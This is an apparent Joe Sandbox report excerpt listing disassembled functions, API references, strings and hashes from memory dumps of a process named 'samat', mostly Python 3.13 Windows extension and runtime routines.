Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID:
String ID: CloseHandle$The object is not a PyHANDLE object
API String ID: 0-4264222050
Opcode ID: dc318d2b1349d4a50ab063cf74b006e41aa0c775c8383e0438a78d5d1f98fbfa
Instruction ID: 45eece54bec16efe2fdc444c4db198fdf9de76abc6cee70bdb8980b064ad5f2b
Opcode Fuzzy Hash: dc318d2b1349d4a50ab063cf74b006e41aa0c775c8383e0438a78d5d1f98fbfa
Instruction Fuzzy Hash: 6C111F22B19B02C2EB509B5DD89007D23A0FF88FD4F844132D71D866B2EE3CD9558300

Function 00007FF8B7E8C920 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8C93D
CoCreateGuid.OLE32 ref: 00007FF8B7E8C965
_Py_NewReference.PYTHON313 ref: 00007FF8B7E8C98B

Strings

:CreateGuid, xrefs: 00007FF8B7E8C936

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_CreateGuidParseReferenceTuple
String ID: :CreateGuid
API String ID: 1283042906-3559396464
Opcode ID: 406caab003073a4f77f67d61481f4c1e26270bd55b296c2a684b999cc2a37536
Instruction ID: 6a1787839154b5be36ed1ba2fafd7d32fd036a1be0046bea7985c74a5696ce48
Opcode Fuzzy Hash: 406caab003073a4f77f67d61481f4c1e26270bd55b296c2a684b999cc2a37536
Instruction Fuzzy Hash: F1014C66A08B4285FB409B69E85116D73A0FF89FD4F841135EB4E46376EF3CE1948B00

Function 00007FF8B7E81B30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E81B47
InitializeAcl.ADVAPI32 ref: 00007FF8B7E81B64

Strings

:Initialize, xrefs: 00007FF8B7E81B40
InitializeAcl, xrefs: 00007FF8B7E81B70

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_InitializeParseTuple
String ID: :Initialize$InitializeAcl
API String ID: 1991639834-2627007299
Opcode ID: 393eb0023e6c4a67651202f94622b7c3e74f33b7195f251b897bfafc05145604
Instruction ID: 582f810232a1a1fc8064da17c7190cc49628589e371b2524caba18fa469e41b0
Opcode Fuzzy Hash: 393eb0023e6c4a67651202f94622b7c3e74f33b7195f251b897bfafc05145604
Instruction Fuzzy Hash: C9F04F62F0870682FB598BAEE85017D2395AF48FC4F884035DB0D463B1EE3CE596D340

Function 00007FF8B7E860C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32 ref: 00007FF8B7E860E4
PyErr_SetString.PYTHON313 ref: 00007FF8B7E860FF
PyUnicode_FromWideChar.PYTHON313 ref: 00007FF8B7E8613F

Strings

The string is too long, xrefs: 00007FF8B7E860F5

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: FromString$CharErr_Unicode_Wide
String ID: The string is too long
API String ID: 1358704699-1150129668
Opcode ID: 3e50894a2f6329b4e245a6427f8e7c1b14ee148e69ae879c50c0a09b0fbc83e2
Instruction ID: 84833e37d77424abc891aa06cfde1fa296886a5900b067b605e15fba7b69d092
Opcode Fuzzy Hash: 3e50894a2f6329b4e245a6427f8e7c1b14ee148e69ae879c50c0a09b0fbc83e2
Instruction Fuzzy Hash: 51011272A18B8185FB609B18E8513BD63A0FF8DF94FC40231D65E466F6DE3CD1558700

Function 00007FF8B7E85420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON313 ref: 00007FF8B7E8543A
CloseHandle.KERNEL32 ref: 00007FF8B7E85447
PyEval_RestoreThread.PYTHON313 ref: 00007FF8B7E85452

Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA

Strings

CloseHandle, xrefs: 00007FF8B7E8546B

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Eval_Thread$BuildCloseDecodeErr_ErrorFormatFreeHandleLastLocalMessageObjectRestoreSaveUnicode_Value
String ID: CloseHandle
API String ID: 2231686540-2962429428
Opcode ID: 083de3100d951dd9bdb6f7860e10261bd61e50a463827633fdd8d26adf2132cc
Instruction ID: 557e1d48b308a84f6857936c5c21dc86df9324ba8370eae10a0d1ae5b3a45d19
Opcode Fuzzy Hash: 083de3100d951dd9bdb6f7860e10261bd61e50a463827633fdd8d26adf2132cc
Instruction Fuzzy Hash: D0F04F26A1874182EB509B9AB44436D62A1EF98BC4F590030EB4E43776DE3CD8828740

Function 00007FF8B7E8FC10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 00007FF8B7E8FC51
__current_exception_context.VCRUNTIME140 ref: 00007FF8B7E8FC5D
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B7E8FC65

Strings

csm, xrefs: 00007FF8B7E8FC20

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: 3b4c1db84a87a6fdb22006f661c73e75c067a881438bcbb587b3e6fc569e0f3a
Instruction ID: 5fa28b84166262f6b7267450ce60d2a0bd5fd2bed0754fbcc118bdb63f364ca8
Opcode Fuzzy Hash: 3b4c1db84a87a6fdb22006f661c73e75c067a881438bcbb587b3e6fc569e0f3a
Instruction Fuzzy Hash: E2F0B432A0430685FB155F29E18406D33A1FF18F84FA48830DB480B667DE3CE9A0C701

Function 00007FF8B7E90248 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 00007FF8B7E9027D
__current_exception_context.VCRUNTIME140 ref: 00007FF8B7E90291
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B7E90299

Strings

csm, xrefs: 00007FF8B7E90269

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: b86dd0a1a1710a2c7cd3376dcc4a259a6d59bebf1e1d349f78f65613216423d0
Instruction ID: f5095a06b2acb5dc24835b70d53ef3800cc0c7ca01f2997839a0f3a0f7a3335b
Opcode Fuzzy Hash: b86dd0a1a1710a2c7cd3376dcc4a259a6d59bebf1e1d349f78f65613216423d0
Instruction Fuzzy Hash: 22F0E237605B45CAD7559F69E8801AC3364FB49B88F995120FB4D4B766CF38D8A08700

Function 00007FF8B7E86330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32 ref: 00007FF8B7E8635B
wsprintfW.USER32 ref: 00007FF8B7E86375
PyUnicode_FromWideChar.PYTHON313 ref: 00007FF8B7E8639F

Strings

IID('%ws'), xrefs: 00007FF8B7E86369

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: From$CharStringUnicode_Widewsprintf
String ID: IID('%ws')
API String ID: 3341265217-2301737843
Opcode ID: 74d81495bdbc85cec00b5cd67ca454c2b63e3e3fa1d9bcce47121b153791d4b7
Instruction ID: 3817b34bd035fe01a57b5519241f519c89305dad7fd292afc3f3b4d5d21f5978
Opcode Fuzzy Hash: 74d81495bdbc85cec00b5cd67ca454c2b63e3e3fa1d9bcce47121b153791d4b7
Instruction Fuzzy Hash: B9F0E162A18B8691EB609B54E4553ED6370FF89BA4F800331D6AD076F5DF3CD159CB00

Function 00007FF8B7E8D340 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E8D368
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8D398

Strings

RECT must be a tuple of 4 ints (left, top, right, bottom), xrefs: 00007FF8B7E8D35E
llll;RECT must be a tuple of 4 ints (left, top, right, bottom), xrefs: 00007FF8B7E8D38E

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_Err_ParseStringTuple
String ID: RECT must be a tuple of 4 ints (left, top, right, bottom)$llll;RECT must be a tuple of 4 ints (left, top, right, bottom)
API String ID: 385655187-1420951713
Opcode ID: 4fb09c2bb181abc938ff80eaaac510f2ee71be2d2c87fa52025b76ed328b3842
Instruction ID: 131e6a069e76b624e30b633a42a2ad18a53aa467773e5f8599365afce26f1110
Opcode Fuzzy Hash: 4fb09c2bb181abc938ff80eaaac510f2ee71be2d2c87fa52025b76ed328b3842
Instruction Fuzzy Hash: 13F0DAA6A04B85A6DB10CB59D4441AD77A0FF89FD4FC58136DA4D43331EE3CD159C700

Function 00007FF7E12DC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7E12DC61F
WriteFile.KERNEL32 ref: 00007FF7E12DC8E7
WriteFile.KERNEL32 ref: 00007FF7E12DC92D
GetLastError.KERNEL32 ref: 00007FF7E12DC9E3

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: ca859f0debb260d3f94ba8c9b9133667254b6a4473089241e7fd301a5f4fd0f6
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: C9D12273B08A818AE711DF65C8412FCB7B9FB54798B80423ACE4E97B89DE78D016C311

Function 00007FF7E12DCF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12DCF4B), ref: 00007FF7E12DD07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12DCF4B), ref: 00007FF7E12DD107

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: c5de0c1b016dee6c47ffbce7ae589440efd151e77c4f1596e05190f260b07dbd
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: C491C523F18A5646F760AF65D8423BDABA8EB40788F94413BDE0E566C5CFB8D441C722

Function 00007FF7E12DF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7E12DFA7C
_get_daylight.LIBCMT ref: 00007FF7E12DFA8D
_get_daylight.LIBCMT ref: 00007FF7E12DFA9E
_isindst.LIBCMT ref: 00007FF7E12DFB69

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: af7e52b8bf652f0943a9ff1549d97317046fe9f25e8a1db069cdcf1377013d55
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: 95511673F042118AEB14EF64DD527FCA7A9AB4835CF900236DD1E52AE5EB78A803C715

Function 00007FF7E12D577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF7E12D57AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF7E12D5811
GetLastError.KERNEL32 ref: 00007FF7E12D58A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12D56B4), ref: 00007FF7E12D58EE

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 68d407348311a22b462f5e677f37e7a4871fb1f43063355b534e63c4c1ebbdaf
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: C1519263F046418AF710EF70D8523BDA7B9BB48758F908436DE0D97688DFB8D4808762

Function 00007FF8B7E8B530 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8B5DA
PyErr_NoMemory.PYTHON313 ref: 00007FF8B7E8B5EB
PyMem_Free.PYTHON313 ref: 00007FF8B7E8B673
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8B686

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_FreeMem_Memoryfreemalloc
String ID:
API String ID: 182096997-0
Opcode ID: 5a0dd487b60a1102b4735315523d65cbd22cac1ecefffe0ac02d4da6dfbaffd5
Instruction ID: 7f6015cf3af06a79302218e6a19e133ed6543ad668a9bfe2206e8fe6a618339a
Opcode Fuzzy Hash: 5a0dd487b60a1102b4735315523d65cbd22cac1ecefffe0ac02d4da6dfbaffd5
Instruction Fuzzy Hash: A7417663A14B9686EA119F59A4002AEB7B5FF94FE4F884232DF1C137A5EE3CD8558700

Function 00007FF7E12C20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7E12C20F4
SetWindowLongPtrW.USER32 ref: 00007FF7E12C2116
GetWindowLongPtrW.USER32 ref: 00007FF7E12C2140
InvalidateRect.USER32 ref: 00007FF7E12C2160

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: bdb3119776480670bd33c00a24fb90074b6b5d7000cde9b4a31b5e9c0cd29130
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: A111E925B0C14282FB55A76AED463799296FFC4780FC48033DB4907B8ACDFDD581C212

Function 00007FF8B7E84B30 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E84B61
memset.VCRUNTIME140 ref: 00007FF8B7E84B73
memset.VCRUNTIME140 ref: 00007FF8B7E84B9E
_Py_NewReference.PYTHON313 ref: 00007FF8B7E84BB2

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: memset$Referencemalloc
String ID:
API String ID: 3353409452-0
Opcode ID: 702a331324a4662ae84315dbd7bb521fc5055dc9d41250d5f85af3e01e8bffa1
Instruction ID: 27b56438d650e50c3f8ba5c00c7f94177e13bc51aa1552f050e164e360dc9c32
Opcode Fuzzy Hash: 702a331324a4662ae84315dbd7bb521fc5055dc9d41250d5f85af3e01e8bffa1
Instruction Fuzzy Hash: B9113522A18B4496E720CF6AF48006EB770FF88F80B455039EB9E83B25EF7CE0518744

Function 00007FF8B7E89080 Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

_Py_NewReference.PYTHON313 ref: 00007FF8B7E890D5
GetLengthSid.ADVAPI32 ref: 00007FF8B7E890DE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E890E8
CopySid.ADVAPI32 ref: 00007FF8B7E890FA

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: CopyLengthReferencemalloc
String ID:
API String ID: 3624451276-0
Opcode ID: eb9076c558b8a3fd92a970d114becebbb9b8943ef10aafd25703f05eb12ffbd7
Instruction ID: 2e4fddf363a0ddfeb77b49734ca5c904d53f1017660ab2308d1d7f4a68ad20fa
Opcode Fuzzy Hash: eb9076c558b8a3fd92a970d114becebbb9b8943ef10aafd25703f05eb12ffbd7
Instruction Fuzzy Hash: 4C014036A09B4186EB449B99F59416D63A5FF89FC0F440034EB4E43B75DF3DE4618700

Function 00007FF7E12CD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7E12CD03C
GetCurrentThreadId.KERNEL32 ref: 00007FF7E12CD04A
GetCurrentProcessId.KERNEL32 ref: 00007FF7E12CD056
QueryPerformanceCounter.KERNEL32 ref: 00007FF7E12CD066

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
